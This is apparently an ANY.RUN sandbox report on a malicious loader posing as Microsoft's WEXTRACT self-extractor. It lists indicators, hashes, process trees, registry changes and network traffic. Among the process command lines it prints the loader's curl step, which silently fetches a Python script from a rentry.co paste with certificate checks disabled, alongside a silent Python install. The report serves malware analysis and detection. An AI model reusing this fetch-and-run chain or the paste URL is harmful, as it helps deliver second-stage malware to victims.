File name:

WEXTRACT (Stage 1).EXE

Full analysis: https://app.any.run/tasks/00ff18b8-ba51-4913-a571-673638703895
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: May 16, 2024, 09:13:12
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
python
Indicators:
MIME: application/x-dosexec
File info: PE32+ executable (GUI) x86-64, for MS Windows
MD5:

C836D9F939E17837428F185F0FC8003F

SHA1:

119BE5EBA7EB367593BB5314AB52E00B0A54E638

SHA256:

0C22DDA19FBE3FDF12E8664C87CC1EF161A2B76D828DF88B025952750985FD51

SSDEEP:

3072:jGiyr95MfxewjwVGkk125W2PScVgkl7T25Tz7unJrOXjmOVV++:jdyr95MfxewjwVDw2LnT25qndIjjVVX

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)
      • curl.exe (PID: 4936)
      • python-installer.exe (PID: 4548)
      • python-installer.exe (PID: 5920)
      • msiexec.exe (PID: 5704)
      • python.exe (PID: 1428)

    • Changes the autorun value in the registry

      • python-installer.exe (PID: 5920)

  • SUSPICIOUS

    • Application launched itself

      • cmd.exe (PID: 7104)
      • python.exe (PID: 6844)

    • Starts a Microsoft application from unusual location

      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)

    • Process drops legitimate windows executable

      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)
      • python-installer.exe (PID: 5920)
      • msiexec.exe (PID: 5704)

    • Executing commands from a ".bat" file

      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)

    • Uses WMIC.EXE

      • cmd.exe (PID: 7160)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 7104)
      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)
      • python.exe (PID: 1428)

    • The executable file from the user directory is run by the CMD process

      • python-installer.exe (PID: 4548)

    • Executable content was dropped or overwritten

      • curl.exe (PID: 4936)
      • python-installer.exe (PID: 4548)
      • python-installer.exe (PID: 5920)
      • python-3.10.0rc2-amd64.exe (PID: 4744)
      • python.exe (PID: 1428)

    • Reads security settings of Internet Explorer

      • python-installer.exe (PID: 5920)

    • Searches for installed software

      • dllhost.exe (PID: 1788)
      • python-installer.exe (PID: 5920)
      • python-3.10.0rc2-amd64.exe (PID: 4744)

    • Reads the date of Windows installation

      • python-installer.exe (PID: 5920)

    • Starts itself from another location

      • python-installer.exe (PID: 5920)

    • Executes as Windows Service

      • VSSVC.exe (PID: 3808)

    • Checks Windows Trust Settings

      • msiexec.exe (PID: 5704)

    • Reads the Windows owner or organization settings

      • msiexec.exe (PID: 5704)

    • The process drops C-runtime libraries

      • msiexec.exe (PID: 5704)
      • python-installer.exe (PID: 5920)

    • Creates a software uninstall entry

      • python-installer.exe (PID: 5920)

    • Creates/Modifies COM task schedule object

      • msiexec.exe (PID: 5704)

    • Loads Python modules

      • python.exe (PID: 6844)
      • python.exe (PID: 1428)

    • Process drops python dynamic module

      • msiexec.exe (PID: 5704)

    • The process executes via Task Scheduler

      • UCPDMgr.exe (PID: 4060)

  • INFO

    • Checks supported languages

      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)
      • curl.exe (PID: 4936)
      • python-installer.exe (PID: 4548)
      • python-3.10.0rc2-amd64.exe (PID: 4744)
      • python-installer.exe (PID: 5920)
      • msiexec.exe (PID: 5704)
      • msiexec.exe (PID: 5712)
      • python.exe (PID: 6844)
      • python.exe (PID: 1428)
      • curl.exe (PID: 4216)

    • Create files in a temporary directory

      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)
      • python-installer.exe (PID: 4548)
      • curl.exe (PID: 4936)
      • python-installer.exe (PID: 5920)
      • python-3.10.0rc2-amd64.exe (PID: 4744)
      • python.exe (PID: 6844)
      • python.exe (PID: 1428)
      • curl.exe (PID: 4216)

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 6196)

    • Reads the computer name

      • curl.exe (PID: 4936)
      • python-installer.exe (PID: 5920)
      • python-3.10.0rc2-amd64.exe (PID: 4744)
      • msiexec.exe (PID: 5704)
      • msiexec.exe (PID: 5712)
      • curl.exe (PID: 4216)
      • WEXTRACT (Stage 1).EXE.exe (PID: 7084)

    • Creates files or folders in the user directory

      • python-installer.exe (PID: 5920)
      • msiexec.exe (PID: 5704)
      • python.exe (PID: 6844)
      • python.exe (PID: 1428)

    • Reads the machine GUID from the registry

      • python-installer.exe (PID: 5920)
      • python-3.10.0rc2-amd64.exe (PID: 4744)
      • msiexec.exe (PID: 5704)
      • python.exe (PID: 1428)
      • python.exe (PID: 6844)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 5704)

    • Reads the software policy settings

      • msiexec.exe (PID: 5704)

    • Creates files in the program directory

      • python-3.10.0rc2-amd64.exe (PID: 4744)

    • Creates a software uninstall entry

      • msiexec.exe (PID: 5704)

    • Checks operating system version

      • python.exe (PID: 1428)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2062:07:25 12:18:00+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.2
CodeSize: 31744
InitializedDataSize: 124928
UninitializedDataSize: -
EntryPoint: 0x8200
OSVersion: 10
ImageVersion: 10
SubsystemVersion: 6
Subsystem: Windows GUI
FileVersionNumber: 11.0.19041.1
ProductVersionNumber: 11.0.19041.1
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Unicode
CompanyName: Microsoft Corporation
FileDescription: Win32 Cabinet Self-Extractor
FileVersion: 11.00.19041.1 (WinBuild.160101.0800)
InternalName: Wextract
LegalCopyright: © Microsoft Corporation. All rights reserved.
OriginalFileName: WEXTRACT.EXE .MUI
ProductName: Internet Explorer
ProductVersion: 11.00.19041.1
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
150
Monitored processes
25
Malicious processes
10
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wextract (stage 1).exe.exe no specs cmd.exe no specs conhost.exe no specs cmd.exe no specs wmic.exe no specs find.exe no specs curl.exe python-installer.exe python-installer.exe python-3.10.0rc2-amd64.exe SPPSurrogate no specs vssvc.exe no specs srtasks.exe no specs conhost.exe no specs msiexec.exe filecoauth.exe no specs msiexec.exe no specs python.exe no specs conhost.exe no specs python.exe cmd.exe no specs curl.exe ucpdmgr.exe no specs conhost.exe no specs filecoauth.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
720\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeUCPDMgr.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1280find "PNPDeviceID"C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ulib.dll
c:\windows\system32\fsutilext.dll
1428C:\Users\admin\AppData\Local\Programs\Python\Python310\python.exe -W ignore::DeprecationWarning -c " import runpy import sys sys.path = ['C:\\Users\\admin\\AppData\\Local\\Temp\\tmpe4ic3_iv\\setuptools-57.4.0-py3-none-any.whl', 'C:\\Users\\admin\\AppData\\Local\\Temp\\tmpe4ic3_iv\\pip-21.2.3-py3-none-any.whl'] + sys.path sys.argv[1:] = ['install', '--no-cache-dir', '--no-index', '--find-links', 'C:\\Users\\admin\\AppData\\Local\\Temp\\tmpe4ic3_iv', '--upgrade', 'setuptools', 'pip'] runpy.run_module(\"pip\", run_name=\"__main__\", alter_sys=True) "C:\Users\admin\AppData\Local\Programs\Python\Python310\python.exe
python.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python
Exit code:
0
Version:
3.10.0rc2
Modules
Images
c:\users\admin\appdata\local\programs\python\python310\python.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\users\admin\appdata\local\programs\python\python310\vcruntime140.dll
c:\users\admin\appdata\local\programs\python\python310\python310.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
1788C:\WINDOWS\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}C:\Windows\System32\dllhost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
COM Surrogate
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\dllhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\msvcrt.dll
3808C:\WINDOWS\system32\vssvc.exeC:\Windows\System32\VSSVC.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\vssvc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4060"C:\WINDOWS\system32\UCPDMgr.exe"C:\Windows\System32\UCPDMgr.exesvchost.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
User Choice Protection Manager
Exit code:
0
Version:
1.0.0.414301
Modules
Images
c:\windows\system32\ucpdmgr.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4216curl -o webpage.py -s https://rentry.co/dqxzeko8 --insecureC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
4548python-installer.exe /quiet /passive InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0C:\Users\admin\AppData\Local\Temp\IXP000.TMP\python-installer.exe
cmd.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
MEDIUM
Description:
Python 3.10.0rc2 (64-bit)
Exit code:
0
Version:
3.10.122.0
Modules
Images
c:\users\admin\appdata\local\temp\ixp000.tmp\python-installer.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
4744"C:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\.be\python-3.10.0rc2-amd64.exe" -q -burn.elevated BurnPipe.{FB38FFEE-1DCE-4784-AFE7-2E16BD701E5B} {9F27897A-0698-4591-972D-5BD765C29B0A} 5920C:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\.be\python-3.10.0rc2-amd64.exe
python-installer.exe
User:
admin
Company:
Python Software Foundation
Integrity Level:
HIGH
Description:
Python 3.10.0rc2 (64-bit)
Exit code:
0
Version:
3.10.122.0
Modules
Images
c:\users\admin\appdata\local\temp\{5a02e259-23f4-4b4d-ba9d-9e226b3e0d1b}\.be\python-3.10.0rc2-amd64.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
4936curl -L -o python-installer.exe https://www.python.org/ftp/python/3.10.0/python-3.10.0rc2-amd64.exe --insecure --silentC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
MEDIUM
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
Total events
48 312
Read events
44 428
Write events
3 768
Delete events
116

Modification events

(PID) Process:(5920) python-installer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(5920) python-installer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(5920) python-installer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(5920) python-installer.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4744) python-3.10.0rc2-amd64.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SystemRestore
Operation:writeName:SrCreateRp (Enter)
Value:
40000000000000003A9E7F6371A7DA018812000090120000D5070000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1788) dllhost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppGetSnapshots (Enter)
Value:
48000000000000000503826371A7DA01FC06000098150000D20700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1788) dllhost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppGetSnapshots (Leave)
Value:
48000000000000008689DC6371A7DA01FC06000098150000D20700000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1788) dllhost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppEnumGroups (Enter)
Value:
48000000000000008689DC6371A7DA01FC06000098150000D10700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1788) dllhost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppEnumGroups (Leave)
Value:
4800000000000000EA56E16371A7DA01FC06000098150000D10700000100000000000000010000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(1788) dllhost.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SPP
Operation:writeName:SppCreate (Enter)
Value:
480000000000000091DBEA6371A7DA01FC06000098150000D00700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
100
Suspicious files
1 263
Text files
3 089
Unknown types
17

Dropped files

PID
Process
Filename
Type
1788dllhost.exeC:\System Volume Information\SPP\snapshot-2
MD5:
SHA256:
1788dllhost.exeC:\System Volume Information\SPP\metadata-2
MD5:
SHA256:
5920python-installer.exeC:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\lib_JustForMe
MD5:
SHA256:
5920python-installer.exeC:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\.ba\BootstrapperApplicationData.xmlxml
MD5:EDD2973CCE008203C69A5F52A9A35BFE
SHA256:7EB78771B5629654F5ECC261EEE58CEC4DEA7284906CA07B80ADE6896F1190EF
5920python-installer.exeC:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\.ba\SideBar.pngimage
MD5:CA62A92AD5B307FAEAC640CD5EB460ED
SHA256:F3109977125D4A3A3FFA17462CFC31799589F466A51D226D1D1F87DF2F267627
5920python-installer.exeC:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\.ba\Default.thmxml
MD5:7A6207931F4F6A7F803128FC3AFDF8DA
SHA256:6A91F0AC6A2169FFDB3AC84C715F77EB5B1527C27DD5AC4C60174242997937A6
1788dllhost.exeC:\System Volume Information\SPP\OnlineMetadataCache\{50e7d657-00ee-4c26-ac45-e6346629564d}_OnDiskSnapshotPropbinary
MD5:CE096092FA5B644C4ED8475B75221579
SHA256:5F607C2A5AF92DDA7B961DFBF64852AA54CDF3A351ECC3F230E8DA1423D28DA9
5920python-installer.exeC:\Users\admin\AppData\Local\Package Cache\{be83e501-a7bf-4692-a6f1-0deb418ad1fb}\python-3.10.0rc2-amd64.exeexecutable
MD5:833D7B73767607CD76C0C81DCC1C5F75
SHA256:ABB2E915CAE562E527CD773E5B399D993634331AD29BEA029CC2048AE239FBDA
5920python-installer.exeC:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\core_JustForMeexecutable
MD5:0EED80D28A6682F8471F689FE3833EB0
SHA256:8104D58F10655CF5F331C8A7ED0C98FB368FB017075D85D9BFCD9131CACF7B05
5920python-installer.exeC:\Users\admin\AppData\Local\Temp\{5A02E259-23F4-4B4D-BA9D-9E226B3E0D1B}\dev_JustForMeexecutable
MD5:C1C76D510B8E9474124A55B09C39BCF2
SHA256:87BC2F57D1628636722461035B17A774551328F96F453E1A7ADBC448D283F7AD
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
25
TCP/UDP connections
24
DNS requests
13
Threats
2

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5704
msiexec.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBT3xL4LQLXDRDM9P665TW442vrsUQQUReuir%2FSSy4IxLVGLp6chnfNtyA8CEAQJGBtf1btmdVNDtW%2BVUAg%3D
US
binary
471 b
unknown
5704
msiexec.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSnR4FoxLLkI7vkvsUIFlZt%2BlGH3gQUWsS5eyoKo6XqcQPAYPkt9mV1DlgCEAM%2B1e2gZdG4yR38%2BSpsm9g%3D
US
binary
471 b
unknown
GET
304
40.68.123.157:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
NL
unknown
5060
SIHClient.exe
GET
200
40.68.123.157:443
https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL
NL
compressed
23.9 Kb
unknown
5060
SIHClient.exe
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl
DE
binary
824 b
unknown
5060
SIHClient.exe
GET
200
40.68.123.157:443
https://slscr.update.microsoft.com/sls/ping
NL
unknown
5060
SIHClient.exe
GET
200
13.85.23.206:443
https://fe3cr.delivery.mp.microsoft.com/clientwebservice/ping
US
unknown
5060
SIHClient.exe
GET
200
2.19.217.218:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
NL
binary
419 b
unknown
5060
SIHClient.exe
GET
200
2.19.217.218:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.2.crl
NL
binary
813 b
unknown
5060
SIHClient.exe
GET
200
2.19.217.218:80
http://www.microsoft.com/pkiops/crl/Microsoft%20Update%20Signing%20CA%202.1.crl
NL
binary
813 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4936
curl.exe
146.75.116.223:443
www.python.org
FASTLY
US
unknown
4
System
192.168.100.255:138
whitelisted
4
System
192.168.100.255:137
whitelisted
5704
msiexec.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
unknown
4680
SearchApp.exe
104.126.37.171:443
Akamai International B.V.
DE
unknown
4680
SearchApp.exe
104.126.37.177:443
Akamai International B.V.
DE
unknown
2908
OfficeClickToRun.exe
52.168.112.66:443
self.events.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
4680
SearchApp.exe
95.100.146.32:443
r.bing.com
Akamai International B.V.
CZ
unknown
5060
SIHClient.exe
20.12.23.50:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
unknown
5060
SIHClient.exe
2.19.217.218:80
www.microsoft.com
Akamai International B.V.
NL
unknown

DNS requests

Domain
IP
Reputation
www.python.org
  • 146.75.116.223
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
self.events.data.microsoft.com
  • 52.168.112.66
whitelisted
r.bing.com
  • 95.100.146.32
  • 95.100.146.19
  • 95.100.146.25
  • 95.100.146.33
whitelisted
slscr.update.microsoft.com
  • 20.12.23.50
whitelisted
www.microsoft.com
  • 2.19.217.218
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.156
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.3.187.198
whitelisted
rentry.co
  • 104.26.2.16
  • 172.67.75.40
  • 104.26.3.16
unknown
settings-win.data.microsoft.com
  • 4.231.128.59
whitelisted

Threats

PID
Process
Class
Message
2184
svchost.exe
Misc activity
ET INFO Pastebin Service Domain in DNS Lookup (rentry .co)
4216
curl.exe
Misc activity
ET INFO Observed Pastebin Service Domain (rentry .co in TLS SNI)
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
WEXTRACT (Stage 1).EXE